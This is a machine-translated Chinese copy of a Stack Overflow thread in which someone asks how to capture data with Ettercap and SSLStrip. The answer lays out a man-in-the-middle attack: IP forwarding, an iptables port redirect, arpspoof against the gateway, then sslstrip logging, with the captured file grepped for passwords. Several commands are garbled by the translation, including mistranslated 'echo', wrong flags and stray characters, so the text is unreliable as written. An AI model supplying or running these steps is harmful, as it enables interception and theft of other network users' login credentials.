我使用Backtrack5作为这个..but是卡住的,...i无法获得我想要的数据,我使用Ettercap和SSL带来实现这个.
这里有人知道怎么做吗?
发布于 2012-08-14 10:59:53
看看你是怎么做的,但对我来说,ettercap( gui)一直都是垃圾。我建议跳过ettercap,除非您想要简单的DNS欺骗,然后选择另一条路线。
让我给您一些步骤,从设置您的iptable为这次攻击(人在中间,阿米尔)和启用ip_forward(ing)。
回声"1“>/proc/sys/net/ipv4 4/ip_forward
iptables -t nat -A PREROUTING -p tcp -目的端口80 -j重定向到端口1337 (可以选择要将它们发送到的任何端口)
现在要成为中间的人:这里我们使用arpspoof: arpspoof -i wlan0(或任何接口) 192.168.1.X(X是网关,通常是.1或.255)
然后使用SSLStrip,您可以继续使用./sslstrip.py -1 1337 -w文件名(1337是前面的端口,文件名是您想转储数据的任何文件名)。
猫文件名(从前面),甚至管道\ grep“密码”或任何你嗅探的东西,或者你可以转储一切。该文件将被捕获/剥离的https数据填充。
https://stackoverflow.com/questions/11847475
复制相似问题